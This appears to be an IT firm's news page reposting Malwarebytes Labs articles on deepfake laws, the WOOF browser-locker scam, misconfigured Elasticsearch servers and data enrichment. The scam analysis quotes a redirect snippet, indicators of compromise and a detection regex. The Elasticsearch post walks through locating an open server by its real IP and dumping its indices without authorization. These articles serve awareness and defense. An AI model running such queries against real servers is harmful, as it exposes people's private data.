IT News

Explore the MakoLogics IT News for valuable insights and thought leadership on industry best practices in managed IT services and enterprise security updates.

Deepfakes laws and proposals flood US

In a rare example of legislative haste, roughly one dozen state and federal bills were introduced in the past 12 months to regulate deepfakes, the relatively modern technology that some fear could upend democracy.

Though the federal proposals have yet to move forward, the state bills have found quick success at home. Already three states—California, Virginia, and Texas—have enacted deepfake laws, and legislation is pending in Massachusetts, New York, and Maryland, which introduced its own bill on January 16 this year.

The laws and pending legislation vary in scope, penalties,
and focus.

The Virginia law amends current criminal law on revenge porn, making it a crime to, for instance, insert a woman’s digital likeness into a pornographic video without her consent. The Texas law, on the other hand, prohibits the use of deepfakes for election interference, like making a video that fraudulently shows a political candidate at a Neo-Nazi rally one month prior to an election.

A New York bill tackles an entirely different subject—how to treat a deceased person’s digital likeness, a reality that is coming to a screen near you (starring James Dean). And two state laws potentially address the rising threat of “cheapfakes,” low-tech digital frauds that require no artificial intelligence tools to make.

This legislative experimentation is expected for an emerging
technology, said Matthew F. Ferraro, a senior associate at the law firm
WilmerHale who advises clients on national security, cyber security, and crisis
management.

“In some ways, this is [an example] of the laboratories of
democracy,” Ferraro said, citing an idea popularized decades ago by Supreme
Court Justice Louis Brandeis. “This is what people cheer about.”

But one category of deepfakes legislation has earned more upset than others—the kind that solely regulates potential election interference. Groups including the American Civil Liberties Union, Electronic Frontier Foundation, and First Draft, which researches and combats disinformation, warn of threats to free speech.

Further, prioritizing political deepfakes legislation could, in effect, deprioritize the larger problem of deepfake pornography, which accounts for a whopping 96 percent of deepfake material online today, said Adam Dodge, founder of the nonprofit End Technology-Enabled Abuse, or EndTAB.

“I think it’s
important that we address future harm, I just don’t want that to come at the
expense of the people being harmed right now,” Dodge said. “We have four
deepfakes laws on the books in the United States, and 50 percent of them don’t
address 96 percent of the problem.”

Today, Malwarebytes provides a more detailed look at deepfakes legislation and laws in the United States, following our analysis last week of the country’s first-ever, federal deepfake rules. Far beyond what that language requires, the following bills and laws call for civil and criminal penalties, and directly address concerns of both political disinformation and nonconsensual pornography.

Federal deepfakes legislation before Congress

Before lawmakers in Washington, DC, are at least four federal deepfakes bills in both the US House of Representatives and the Senate. They are:

  • The Identifying Outputs of Generative
    Adversarial Networks (IOGAN) Act
  • The Deepfake Report Act of 2019
  • A Bill to Require the Secretary of Defense to
    Conduct a Study on Cyberexploitation of Members of the Armed Forces and Their
    Families and for Other Purposes
  • The Defending Each and Every Person from False
    Appearances by Keeping Exploitation Subject (DEEP FAKES) to Accountability Act

The bills largely hew to one another. The IOGAN Act, for example, would require the directors of both the National Science Foundation and the National Institute of Standards and Technology to submit reports to Congress about potential research opportunities with the country’s private sector in detecting deepfakes.

The Deepfake Report Act would require the Department of Homeland Security to submit a report to Congress about the technologies used to create and detect deepfakes. Senator Ben Sasse’s “cyberexploitation” bill would require the Secretary of Defense to study the potential vulnerabilities of US armed forces members to cyberexploitation, including “misappropriated images and videos as well as deep fakes.”

The DEEP
FAKES Accountability Act, however, extends beyond reporting and research requirements.
If passed, the bill would require anyone making a deepfake—be it image, audio,
or video—to label the deepfake with a “watermark” that shows the deepfake’s
fraudulence.

But Dodge said
watermarks and labels would fail to help anyone whose likeness is used in a
nonconsensual deepfake porn video.

“The reality is, when it comes to the battle against deepfakes,
everybody is focused on detection, on debunking and unmasking a video as a
deepfake,” Dodge said. “That doesn’t help women, because the people watching those
videos don’t care that they’re fake.”

The DEEP
FAKES Accountability Act would make it a crime to knowingly fail to provide that
watermark, punishable by up to five years in prison. Further, the bill would
impose a civil penalty of up to $150,000 for each purposeful failure to provide
a watermark on a deepfake.

According to
Electronic Frontier Foundation, those are severe penalties for activities that
the bill itself fails to fully define. For example, making a deepfake with the
intent to “humiliate” someone would become a crime, but there is no clear
definition of what that term means, or whether that humiliation would require
harm. In the bill’s attempt to stop deceitful and malicious activity, the organization
said, it may have reached too far.

“The [DEEP
FAKES Accountability Act] underscores a key question that must be answered:
from a legal and legislative perspective, what is the difference between a
malicious ‘deepfakes’ video and satire, parody, or entertainment?” the
organization wrote
. “What lawmakers have discussed so far shows they do not
know how to make these distinctions.”

Statewide,
the concerns shift to whether deepfakes legislation will have its intended
effect.

State deepfakes laws and legislation

Last summer, the warnings about the democratization of deepfakes technology became reality—a new app offered for free on Windows gave users the ability to remove clothes from uploaded photos of women. The app, called DeepNude, was first discovered by Motherboard. It shut down just hours after the outlet published its first piece.

Less than one week later, a new deepfake law in Virginia came
into effect. The state’s lawmakers had passed it months earlier, in March.

Unique when compared to later state deepfake laws, Virginia’s
law did not craft a new crime for deepfake creation and distribution, but
instead expanded its current law on revenge porn to include deepfakes material.
Now, in Virginia, anyone who shares or sells nude or sexual images and videos—including
deepfakes—with the intent to “coerce, harass, or intimidate,” is guilty of a
Class 1 misdemeanor.

Dodge said he appreciated Virginia’s approach.

“The Virginia law is interesting because it’s the only law
that has taken the existing nonconsensual pornography criminal code section and
amended it to include deepfakes pornography,” Dodge said, “and I like that.”

Shortly after Virginia enacted its deepfake law, Texas
followed, passing a law that instead focused on election interference.
According to the law, the act of creating and sharing a deepfake video within 30
days of an election with the intent to “injure a candidate or influence the
result of an election” is now a Class A misdemeanor. The law’s definition of a
deepfake is broad: a video “created with the intent to deceive, that appears to
depict a real person performing an action that did not occur in reality.”

The law has already received a high-profile use-case: Houston Mayor Sylvester Turner asked the district attorney to investigate his opponent’s campaign for making a television ad that showed edited photos of the mayor, along with an allegedly fake text he sent.

In October, California followed both Virginia and Texas, passing two laws—one to prohibit nonconsensual deepfake pornography, and the other to prohibit deepfakes used to impact the outcome of an upcoming election.

The bills’ author—Assembly Member Marc Berman—said he wrote the latter bill after someone created and shared an altered video of Nancy Pelosi, appearing to show her as impaired or drunk. But the video was far from a deepfake. Instead, its creator simply took footage of the Speaker of the House of Representatives and slowed it down, making what is now referred to as a “cheapfake.”

Ferraro said that trying to pass legislation to prevent
cheapfakes will be difficult, though.

“It’s going to be very hard to write a bill that captures
all of those so-called cheapfakes, because the regular editing of videos could
fall under a definition that is too broad,” Ferraro said, explaining that standard,
everyday broadcast interviews incorporate countless edits that might change the
overall impression of the interview to audiences, even when the edits are done
for non-malicious reasons, like cutting away from a political candidate giving
a speech to show their audience.

“That’s the sort of problem of the cheapfake: Simple editing
can give vastly different impressions, based on the content,” Ferraro said.

As California, Texas, and Virginia work out the enforcement
of their laws, Maryland, New York, and Massachusetts are considering their own approaches
to legislating deepfakes.

On January 16, Maryland introduced a bill targeting political influence deepfakes. The bill, which has a scheduled hearing in early February, prohibits individuals from “willfully or knowingly influencing or attempting to influence a voter’s decision to go to the polls or to cause a vote for a particular candidate by publishing, distributing, or disseminating a deepfake online within 90 days of an election.”

The Massachusetts deepfake legislation would criminalize the
use of deepfakes for already “criminal or tortious conduct,” in effect making
it illegal to use a deepfake in conjunction with completing other crimes. So,
committing fraud? That’s a crime. But deploying a deepfake to aid in committing
that fraud? Well, that would also be a crime.

Finally, in New York, state lawmakers are trying to
legislate a different aspect of deepfakes and digital recreations—the rights to
an individual’s digital likeness. The bill was introduced last year, expired,
and was then re-introduced. It would protect a person’s digital likeness 40
years after their death. The bill would also create a registry for surviving
family members to record their control of a deceased relative’s likeness.

The Screen Actors Guild‐American Federation of Television
and Radio Artists supported the bill.

“The state’s robust performance community should not have to endure years of costly litigation to protect their basic livelihood and artistic legacy,” the group said.

Major motion picture studios, including Disney, Warner Bros., and NBCUniversal opposed the bill. Though Disney’s filmmakers said they received approval from the estate of the late actor Peter Cushing to use his likeness in the 2017 movie Star Wars: Rogue One, it’s not hard to see why required approval for future projects would prove an obstacle for Hollywood.

What next?

The opposition to deepfakes laws is clear: Such laws could
be overbroad, uninformed, and, in their attempt to regulate one problem,
actually trample on the protected rights of Americans.

The bigger question is, has the opposition been successful? In
a word, no.

Texas passed its election interference deepfake law with no recorded opposition votes in either the House or the Senate (though two House members were a “no vote” and four abstained). California similarly passed its election interference deepfake law in a 67–4 vote in the Assembly and a 29–7 vote in the Senate. After the vote, the ACLU of California wrote to the California governor, asking for a veto. It didn’t work.  

In Washington, DC, though, the situation could be different, since new Federal rules on deepfakes research were approved last month. Those rules require the Director of National Intelligence to submit a report to Congress in 180 days about deepfakes capabilities across the world and possible countermeasures in the US. Until that report is submitted, Senators and Representatives might have little appetite to move forward.

Much like the statewide sweep of data privacy laws last year, the future of deepfake laws depends on political will, popularity, and whether lawmakers even have time to draft and pass such legislation. It is, after all, an election year.

The post Deepfakes laws and proposals flood US appeared first on Malwarebytes Labs.

WOOF locker: Unmasking the browser locker behind a stealthy tech support scam operation

In the early days, practically all tech support scammers would get their own leads by doing some amateur SEO poisoning and keyword stuffing on YouTube and other social media sites. They’d then leverage their boiler room to answer incoming calls from victims.

Today, these practices continue, but we are seeing more advanced operations with a clear separation between lead generation and actual call fulfillment. Malvertising campaigns and redirections from compromised sites to browser locker pages are owned and operated by experienced purveyors of web traffic.

There is one particular browser locker (browlock) campaign that had been eluding us for some time. It stands apart from the others, striking repeatedly on high-profile sites, such as the Microsoft Edge Start page, and yet, eluding capture. In addition, and a first to our knowledge, the browser locker pages were built to be ephemeral with unique, time-sensitive session tokens.

In November 2019, we started dedicating more time to investigating this campaign, but it wasn’t until December that we were finally able to understand its propagation mechanism. In this blog, we share our findings by documenting how threat actors used targeted traffic-filtering coupled with steganography to create the most elaborate browser locker traffic scheme to date.

A well-documented history

There are many public reports about this tech support scam affecting users with the same red screen template. Contrary to what some people have posted online, this is not malware, and computers aren’t infected. It is simply what we call a browser locker, or browlock for short, a social engineering technique that gives the illusion of a computer virus and scares people into calling a toll-free number for assistance. Here are some examples:

One lengthy and epic forum thread on Microsoft’s forums describes how this browlock campaign has been afflicting the Microsoft Edge start page and even left Microsoft engineers puzzled as to where, exactly, it came from:

We do quite a bit of work to scan the ads we get from our exchanges, but some behave differently for certain users than they do when we do our scanning. In the future, please continue to submit feedback so we can narrow the scans on our end and potentially reproduce and remove this once and for all.

This is noteworthy for a couple of reasons: First, it is quite daring to push your browlock right on Microsoft’s own start page. Second, a large part of the targeted audience for tech support scams are going to be people that use Windows’ default browser and start page. To this day, this campaign is still active on the MSN portal.

ecosystem
Figure 1: Life cycle of a tech support scam campaign

This browlock was also found on many other large sites, including several online newspaper portals. For a campaign to run with such a wide distribution and for this length of time is unheard of, at least when it comes to browser lockers.

Cat-and-mouse game

Each victim report we received was more or less the same. A user would open up the MSN homepage or perhaps be browsing a popular tech portal, when all of the sudden their screen would turn red and display a warning message similar to the one shown below:

Edge1
Figure 2: Browlock as seen by a victim

As we’d go to manually check the page, we would be greeted with a “404 Not Found” error message, as if it were gone. For this reason, we began calling this campaign the “404Browlock.” Attempts to replay the browser locker redirection by visiting the same portals as the victims were also unsuccessful.

Edge2
Figure 3: Same browlock URL but now unavailable

Most, if not all, browlock URLs can be revisited without any special user-agent or geo-location tricks. In fact, browlocks themselves aren’t typically sophisticated; their only advantage is they can iterate through hundreds or thousands of different domain names more rapidly than one can blacklist them.

Mapping the browser locker campaign infrastructure

Despite coming up empty each time, we started to build a list of indicators of compromise (IOCs) and did some retro hunting to get a better idea of the scale of this campaign.

Most domain names are registered on the .XYZ TLD (although several other TLDs have and continue to be used) and named using dictionary words grabbed somewhat alphabetically.

2019-12-06,transfiltration[.]xyz,158.69.0[.]190,AS 16276 (OVH SAS)
2019-12-06,transmutational[.]xyz,158.69.0[.]190,AS 16276 (OVH SAS)
2019-12-06,tricotyledonous[.]xyz,158.69.0[.]190,AS 16276 (OVH SAS)
2019-12-06,triethanolamine[.]xyz,158.69.0[.]190,AS 16276 (OVH SAS)
2019-12-06,trigonometrical[.]xyz,158.69.0[.]190,AS 16276 (OVH SAS)
2019-12-06,trithiocarbonic[.]xyz,158.69.0[.]190,AS 16276 (OVH SAS)

The threat actor hosts, on average, six domains on each VPS server, and then rotates to new ones when they are burned. After retro hunting back to June 2019, we collected over 400 unique IP addresses.

graph view
Figure 4: Graph view of domains and servers for this campaign

Looking at additional data sources, we can see that this browser locker campaign started at least in December 2017. At the time, the infrastructure was located on a different hosting provider and domains used the .WIN TLD.

AS44050
Figure 5: The earliest known instance of the browlock

Even back then, visiting the browlock URL directly (without proper redirection) would also result in a 404 page.

urlscanio win
Figure 6: Incomplete browlock scanned by crawler

One lone artifact, an audio file (help.mp3), was indexed by VirusTotal and can be played below:

Again based on open source data, we created a rough timeline of the infrastructure the threat actors abused—from where they were first spotted on Petersburg Internet to moving briefly to DigitalOcean before settling on OVH from January 30, 2019 onward.

timeline
Figure 7: Timeline showing changes in hosting providers

Steganography to hide redirection mechanism

Given that we couldn’t identify how this browlock was propagating, we figured it must be using an unconventional trick.

Many of the sites that victims reported being on when the browlock happened contained videos, so we thought one likely vector could be video ads. This form of malvertising is more advanced than traditional malicious banners because it enables the crooks to hide their payload within media content.

Once again, we spent a fair amount of time looking at video ads but still couldn’t identify the entry point. We switched our search to another type of medium but evidence was shared with us later on confirming the video ad infection vector.

Coincidentally, we had just been studying some interesting new developments with online credit card skimmers where malicious code was embedded into image files. This technique, known as steganography, is a clever way to hide artifacts from humans and scanners.

While developing tools to identify such rogue images, we came across what we thought might be the smoking gun. We discovered a PNG file that contained obfuscated data.

This time though, if the fraudsters were indeed using steganography, they certainly weren’t making it obvious. We identified a malformed PNG file that contained extra data after its end of file marker and looked suspicious.

PNG
Figure 8: A small image hiding away data (the browlock URL)

Unlike the aforementioned credit card skimmer, which was clearly visible and recognizable with obvious character strings, this one looked like it was encoded. And clearly, the image on its own could not be weaponized without additional code to load with the per-victim unique key to decrypt it.

Anti-bot and traffic filtering

The JavaScript code that interacted with the PNG image used some light hex obfuscation and random variable naming to hide its intentions.

videocard
Figure 9: JavaScript used to fingerprint users and decode the PNG

The hex string x57x45x42x47x4c decodes to WEBGL, and by decoding the rest of the obfuscated variable, we can see that this script is using the WEBGL_debug_renderer_info API to gather the victim’s video card properties. This allows the threat actors to sort real browsers (therefore real people) from crawlers or even virtual machines, which would not show the expected hardware information. The Zirconium group’s vast malvertising operation, disclosed in January 2018 by Jerome Dangu over at Confiant, also used that same API to filter traffic.

But perhaps the most interesting function within this JavaScript snippet is the one that processes the actual PNG image behind the steganography. The _Nux function parses the image data by using the @#@ delimeter (as seen in Figure 8 above) and stores it within the _OIEq variable.

function
Figure 10: The core function responsible for the decryption of the PNG data

If the user is detected as a bot or not interesting traffic, the PNG does not contain the extra data after the IEND end of file marker, and therefore the _OIEq variable will be empty.

clean PNG
Figure 11: A clean/decoy PNG (for non targets)

The function still attempts to parse the PNG, but it will fail on the eval, and will not generate the browlock URL. The user, not being considered a proper candidate, will not be redirected and won’t even be aware of the fingerprinting that just happened.

empty data
Figure 12: When the PNG does not contain any extra data, no browlock URL is returned

This kind of filtering is not usually seen (except for advanced malvertising operations), which is one of the reasons why so many victims have experienced this browlock, yet little is known about it.

Anti-replay mechanism

The next evasion technique is intended for security folks, and those trying to troubleshoot these malicious redirections. A network traffic capture (SAZ, HAR) must include the malicious JavaScript, as well as the steganographic PNG and the browlock itself.

traffic
Figure 13: Network traffic revealing the elements behind the redirection

Similar to a technique we’ve previously only observed with exploit kits, the threat actor is using one-time tokens to prevent “artificial” replays of the redirection mechanism. If the proper session key is not provided, the decryption of the PNG data will fail to produce the browlock URL.

token
Figure 14: When the wrong key is supplied, the code fails to generate the browlock URL

Once again, we must pause for a moment and note that this kind of complexity is unheard of for something like a browser locker. While cloaking techniques are common, this is by far the most covert way we’ve seen to redirect to any browlock.

Other traffic chains

After we had discovered the PNG redirection mechanism, we shared our findings with security firm Confiant. They were aware of the domain api.imagecloudsedo[.]com but had seen it in a different campaign. Confiant nicknamed it WOOF due to a string of the same name found in the code.

WOOf script
Figure 15: WOOF script identified by Confiant in September 2019

Additionally, Google, via Confiant’s intermediary, shared yet another instance that explains the number of redirections from newspaper sites we had been seeing. This second instance of the WOOf script was loaded via video widgets.

Digital Media Communications, a company that specializes in ads converted into widgets for the web, was apparently compromised several months ago. According to data collected by the Internet Archive, one of their scripts hosted at widgets.digitalmediacommunications[.]com/chosen/chosen.jquery.min.js was injected on August 13, 2019.

injected 1
Figure 16: Evidence of tampering caught via Internet Archive

A number of websites, many of them news portals, load this widget and are therefore unwittingly exposing their visitors, as the compromised library subsequently retrieves the malicious PNG from api.imagecloudsedo[.]com before redirecting to the browlock page.

videotour
Figure 17: Online newspaper site with compromised widget

It’s highly likely that there are other compromises of third parties that haven’t been found yet, although we suspect that the methods used would be similar to the ones we know about.

Examining the browser locker page

The following diagram depicts what needs to take place in order for victims to get redirected to the browser locker page after several layers of validation.

flow
Figure 18: Flow showing redirection mechanism to browlock pages

Ultimately, the previously analyzed function will arrive at the eval part of the code and return code to launch the browlock.

top.location = '[browlock URL]';

This little bit of code redirects the current browser page to the new URL. It is, in fact, one of the most common techniques for malicious ads to redirect users to scam pages. We believe the threat actor is likely using the same trick for its other malvertising campaigns.

browlock
Figure 19: The browlock template for Google Chrome

This browser locker is clean and contained as it obfuscates its source code and has few external dependencies, such as libraries. We can see that it uses the evil cursor, which is a flaw that allows criminals to create a fake cursor that tricks users into clicking on the wrong area when they are trying to close a browlock.

evilcursor
Figure 20: Source code showing the fake cursor designed to interfere

While Chrome and Edge users can somewhat get rid of the offending page, on Firefox, this is a true browlock, causing the browser to eventually crash.

FF browlock
Figure 21: User cannot close the browlock in Firefox

The code used to freeze the browser has been duplicated enough times to render the browser useless. In the image below, we see the same function with slightly different parameters.

pushstate
Figure 22: Code responsible for the browlock effect

If we deobfuscate any of the functions, we recognize the history.pushState() method, which we reported back in 2016, and which is still not handled well by most browsers. This bug actually came to Mozilla’s attention three years ago, and more recently when someone reported the same 404Browlock:

bug report
Figure 23: User reporting same browlock to Mozilla

Browser lockers can be difficult to fix because they often use code that is otherwise perfectly legitimate. Browser vendors often have to juggle with performance and compatibility issues at the same time.

Handing victims over to tech support scammers

The ultimate goal for browser lockers is to get people to call for assistance to resolve (non-existent) computer problems. This is handled by third parties via fraudulent call centers. The threat actor behind the traffic redirection and browlock will get paid for each successful lead.

To confuse victims, the fake Microsoft agent will tell you to run some commands simply intended to open up a browser window.

hh
Figure 24: Scammer instructing victim to run a command

From there, they will ask you to download and run a remote assistance program that will enable them to take control of your computer. A few minutes later, they will use their favorite tool, notepad, to start drafting an invoice:

payment
Figure 25: The invoice to fix this browlock

While the machine is still supposedly infected, they will simply browse to a site to take the payment for 1 year, 3 year, or 5 year plans costing $195, $245, and $345, respectively.

Where do we go from here?

Given the level of sophistication involved in this campaign, we can expect that the threat actor has diversified their traffic to have some kind of redundancy.

We hope that our efforts to expose this scheme will help others to identify the browlock redirections within their networks. Despite our repeated attempts to report these abuses, they have not been fixed. We remain available to OVH for closer collaboration to shut down this campaign.

For best protection against this and other browlocks, we recommend using our free browser extension, Browser Guard. Not only does it benefit from our domain and IP blacklist, but it can also detect and block browlocks and other tech support scams via signatureless techniques.

Acknowledgements

We would like to thank Confiant for sharing additional data regarding the other cases of the malicious script (_WOOf variant).

Thanks to @prsecurity_ for pointing out a quicker way to retrieve the browlock URL by RC4 decrypting the PNG data using the unique key found within the script.

Indicators of Compromise (IOCs)

There are simply too many IOCs to put here, so we’ve uploaded the browlock domains and IP addresses as a STIX2 file onto our GitHub page. It includes data going back to June 2019 based on indicators we collected by conducting retro hunting. Please note that this is only a partial account of this campaign based on the data we could collect.

Compromised library

widgets.digitalmediacommunications[.]com/chosen/chosen.jquery.min.js

Steganographic redirector

api.imagecloudsedo[.]com
141.98.81[.]198

Regex to identify the browlock URLs

/en/?search=w?(%[w_-~.]{1,4}){10,20}&list=([0-9]00000|null)$

The post WOOF locker: Unmasking the browser locker behind a stealthy tech support scam operation appeared first on Malwarebytes Labs.

A week in security (January 13 – 19)

Last week on Malwarebytes Labs, we taught you how to prevent a rootkit attack, explained what data enrichment means, informed you about new rules on deepfakes in the US, and demonstrated how backdoors in elastic servers expose private data.

Other cybersecurity news

  • An online group of cybersecurity analysts calling themselves Intrusion Truth have revealed information about their fourth Chinese state-sponsored hacking operation. (Source: ZDNet)
  • Travelex warned customers of a phone scam threat in wake of their ransomware attack. (Source: Graham Cluley)
  • The federal government is preparing for another fight with Apple in an ongoing battle for access to encrypted iPhones. (Source: Vox recode)
  • Proof-of-concept exploit code has been published for critical flaws impacting the Cisco Data Center Network Manager (DCNM) tool for managing network platforms and switches. (Source: ThreatPost)
  • The Dutch National Cybersecurity Centre (NCSC) says that companies should consider turning off Citrix ADC and Gateway servers if the impact is acceptable. (Source: BleepingComputer)
  • Hackers stole personal information from 100,000 West Australians in a cyberattack on P&N Bank. (The West Australian)
  • In an important Patch Tuesday release, Microsoft fixed critical bugs in CryptoAPI, RD Gateway, and .NET. (Source: Naked Security)
  • The latest update to Google’s Smart Lock app on iOS means you can now use your iPhone as a physical 2FA security key for logging into Google’s first-party services in Chrome. (Source: The Verge)
  • The domain name weleakinfo.com has been seized by the FBI. The website sold information claiming to have more than 12 billion records gathered from over 10,000 breaches. (Source: DarkReading)
  • Pretending to be the Permanent Mission of Norway, Emotet operators performed a targeted phishing attack against users associated with the United Nations. (Source: BleepingComputer)

Stay safe, everyone!

The post A week in security (January 13 – 19) appeared first on Malwarebytes Labs.

Business in the front, party in the back: backdoors in elastic servers expose private data

It seems like every day we read another article about a data breach or leak of cloud storage exposing millions of users’ data.

The unfortunate truth is that the majority of these leaks require no actual “hacking” on the part of the attacker. Most of the time, this highly confidential data is just sitting in open databases, ripe for the picking.
It’s all too easy to discover data leaks online, especially in cloud services, which says a lot about the state of security and preparedness for cyberattacks—we have a long way to go.

Continuing my series on insecure cloud infrastructure, where I previously covered AWS and PACS, I will be going into some detail on elastic servers. Specifically, I will cover a number of cases in which I discovered a common misconfiguration, leading to open backdoors, which expose many records of personal data.


Exposed databases using search

Before I go into detail on the accidental backdoors found in elastic servers, let’s take a look at just how easy it is to find one of these exposed databases online.

While there are dozens of tools and methods for this discovery phase, for the purposes of this demonstration, I used shodan, a search engine that crawls the web for Internet-connected devices.

Let’s do a quick experiment and see if it yields results. With a quick Google search on elastic databases, we learn that elastic databases by default listen on port 9200.

Screen Shot 2020 01 10 at 11.11.24 AM
Screen Shot 2020 01 17 at 9.52.54 AM

From there, we open up shodan and search:
elastic port:9200

This will basically bring up IPs who have a service responding on port 9200 and whose content contains the word “elastic.” Ninety-nine percent of the time, this will bring up an elastic search server.

For the sake of full comprehension, I will give a 10-second primer on how to use the elastic search API.

Elastic can be compared to MYSQL in the following way:

MYSQL ELASTIC
Databases Indices
Tables Types
Records – column and row Document with properties

Here are a few key commands to help you navigate any elastic instance. The first is the /_cat command and the second is the /_search?pretty=true.
The cat command simply lists information, and it is a good starting point to understand what indices or fields you have to work with.

Elastic servers

Jumping into shodan, we start our search for elastic databases.

Screen Shot 2020 01 13 at 3.56.41 PM 1

Let’s choose the a random IP that comes up from the shodan query. In this case, it is a server residing in China: https://www.shodan.io/host/47.104.101.159#9200

We can check if it is open to the world by typing in: http://47.104.101.159:9200/_cat/

This brings up the following results:

Screen Shot 2020 01 10 at 12.04.39 PM

Seems like no authentication so far. Let’s look at what indices exist here by typing in /_cat/indices, which gives us the following results:

Screen Shot 2020 01 10 at 12.10.14 PM

So far so good. It is clear that at the moment we will not likely be facing any authentication stopping us from accessing the data. Now we can list the contents of one of these indices, similar to a Select * from TABLE_NAME in sql. Lets choose one at random, kms_news, which looks to have 37 records inside.

We type http://47.104.101.159:9200/dzkj_news/_search?pretty=true
and voila! All the data spits out for us with hardly any effort at all.

Screen Shot 2020 01 10 at 12.15.38 PM

As you can see, it was quite easy to find exposed data in a random elastic server online. In less than a minute, we found an exposed server and could continue to dump all the data. I am certain that if we spent a bit more time, we would find a database with a more critical leak.

There is a reason, after all, that these databases have received so much press for their infamous leaks.


The backdoor

Now lets get to the topic at hand… the misconfigurations leading to the backdoor.

Along with elastic, you often hear the word Kibana. This is basically the GUI front end to an elastic database, allowing you to browse/search data and configure the structure and details of the elastic instance.

As such, it is common for companies to have an internal elastic DB on premise and expose the Kibana front end so that employees may access the data from their web browser, fully authenticated. In this case, the Kibana server could listen on port 5601, open to the Internet, and will access the data from an internal elastic DB behind the company’s local intranet.

Screen Shot 2020 01 14 at 9.48.08 AM
Proper configuration

So where does the backdoor lie? Well, after having done an exhaustive search of various Kibana servers online, I noticed something funny happening on a large number of results.

I would browse to the Kibana instance and receive the login screen as expected, but after doing a port scan using nmap on the same IP, I noticed a familiar port being opened:

login 1

The infamous 9200!

Screen Shot 2020 01 14 at 10.04.48 AM 1

To be specific, I found more than 20 servers within a span of five minutes with this same misconfiguration. What’s going on here is that an admin set up elastic search and decided to allow access through the Kibana front end, restricted by proper authentication. The problem, however, is that the actual data store on port 9200 isn’t just communicating internally. It, too, is exposed to the Internet, allowing backdoor access to the data directly from elastic queries carried out by anyone who wants to look, just as we did in the example above.

Here is an illustration showing the misconfiguration, which should make it all the more clear.

badMiconf

Finding a port 9200 exposed to the public does not mean there will be something of value inside. However, the combination of these two ports being exposed and restricting access only on Kibana almost guarantees that there is data here the company wanted to keep private.

Elastic ready to snap

Elastic is likely the number one source of leaked data online, and after conducting this research, I would attribute that to how easy it is to misconfigure. The focus, of course, being on the relationship between the internal server on 9200 and the public-facing component on 5601.

The purpose of this article was not to talk about a specific company or to put anyone on blast for exposing public data. Rather, I am hoping to explain just how many servers are sitting on the Internet with this backdoor. There are thousands of elastic servers open to the public and exposing data—this is nothing new. What makes these specific cases unique is that there were clearly attempts to incorporate some type of security, however, the platform is clearly being misunderstood.

Because elastic search is such a commonly used cloud database, it’s important to highlight this specific misconfiguration because it can easily be fixed.

Finding the exposed data was neither the result of a 1337 hack, nor a difficult side channel to discover. Hopefully this may help admins using elastic to better understand the danger of defaults, and for security analysts, this hopefully provided some useful information on researching new cloud infrastructures.

Stay tuned for the next article in this series where I will be covering the details of various leaks found on elastic.

The post Business in the front, party in the back: backdoors in elastic servers expose private data appeared first on Malwarebytes Labs.

Explained: data enrichment

How do your favorite brands know to use your first name in the subject line of their emails? Why do you seem to get discounts and special offers on products you’ve recently purchased? Businesses are able to personalize their marketing messages thanks to data enrichment.

Data enrichment applies to the process of enhancing, refining, and improving on raw data. It is usually the last step in constructing a dataset for a marketing campaign, but can be used for several other goals.

Contact enrichment is the most common form of data enrichment. Contact enrichment is the process of adding additional information to existing contacts for more complete data.

Consider, for example, the scenario where a database contains names and addresses, but is missing telephone numbers that sales teams will need to reach out to prospective customers. One option is to apply contact enrichment that can match the data that the existing database contains with the telephone numbers listed in another database.

Definition of data enrichment, extended

Data enrichment is defined as merging third-party data from an external authoritative source with an existing database of first-party customer data. Some organizations do this to enhance the data they already possess so they can make more informed decisions.

More broadly, data enrichment refers to processes used to enhance, refine, or otherwise improve on raw data. In this context, it encompasses the whole strategy and process needed to improve existing databases. This idea and other related concepts are essential in making data a valuable asset for almost any modern enterprise.

Data enrichment processes

Even though data enrichment can be accomplished in several different ways, many of the tools used to refine data in a dataset focus on correcting errors or filling in incomplete data. A common data enrichment process would, for example, correct likely misspellings or typographical errors in a database by using precision algorithms designed for that purpose. And some data enrichment tools could also add information to simple data tables.

Another way in which data enrichment can work is by extrapolating data. Through methodologies such as fuzzy logic, engineers can produce extra information from a given raw data set. This and other similar projects can also be described as data enrichment activities.

Data enrichment can also include the merger of data-tables into a new dataset by using corresponding fields. In layman’s terms: Companies can buy access to other databases and look for additional information about their customers, adding that information to their own database.

Privacy concerns

The merger or combination of data hardly ever happens after a subject has been asked for permission. This poses a privacy problem, as users typically have a reasonable idea about which information they have provided to a specific organization, but if organizations add information from other databases, this picture will be skewed. The organization will have information about them of which they are not aware.

As long as this is generally available information, the problem is minor. But consider the famous example of your insurance company getting hold of the data gathered on the client-card of your supermarket. Knowing what you buy and consume may be something you would rather keep from them.

There are some privacy regulations that limit data enrichment for this very reason. The General Data Protection Regulation (GDPR) is a regulation on data protection and privacy in the European Union (EU) and the European Economic Area (EEA). It also addresses the transfer of personal data outside the EU and EEA areas. GDPR allows customers to ask which information is present about them in an organizations’ database and have records or parts of the records deleted.

Since GDPR also regulates the exchange and transfer of personal data, this can severely limit an organization’s choice of data enrichment providers. In the GDPR terminology, any data provider you use is a “Data Processor.” In order to send any EU citizens’ data to any Data Provider for any purpose, including enrichment, you must have a Data Processing Agreement (DPA) signed with the vendor.

A DPA is a legally-binding contract that states the rights and obligations of each party concerning the protection of personal data. They are mandatory to establish a chain of responsibility for the use, and safety, of personal data.

Steps to successful data enrichment

There are a few things to be done before
you embark on a successful data enrichment process:

  • Sanitize your own data, or you will end up paying for data you will never use. Getting extra information about non-existing people, or adding to incomplete records is a waste.
  • Determine your goals and purpose for the data enrichment exercise. Again, avoid paying for data that turns out to be useless. Don’t pay for data tables just because they are available. If you are not going to use them, skip them.
  • Determine which processes the enriched data will support. Will the projected return outweigh the cost?
  • Determine your target market in terms of account profiles and personas. Do you want the data for a subset of customers that meet certain criteria, or would you, for example, like to exclude residents of GDPR-enforcing countries?

Sanitizing not only means removing duplicates, but also checking the validity of older data and the usefulness of entries that were filled out by customers or prospects themselves—on your website, for example.

Once you have determined your goals and decided which data are crucial to achieve these goals, then start looking for a data provider. Some may be more expensive but stronger in a certain data field. You can maximize your success by finding the data provider that best fits your needs.

Not all data enrichment makes you rich

Keep in mind that buying—and storing—the extra data will cost you. Data needs to be backed up and protected, and the storage costs can amount to a pretty sum depending on the size of the datasets. And if the data is not kept up to date, then it may soon become worthless.

Finally, if you’re ever breached, the amount and type of leaked data are determining factors for the ensuing loss of reputation.

The post Explained: data enrichment appeared first on Malwarebytes Labs.

How to prevent a rootkit attack

If you’re ever at the receiving end of a rootkit attack, then you’ll understand why they are considered one of the most dangerous cyberthreats today.

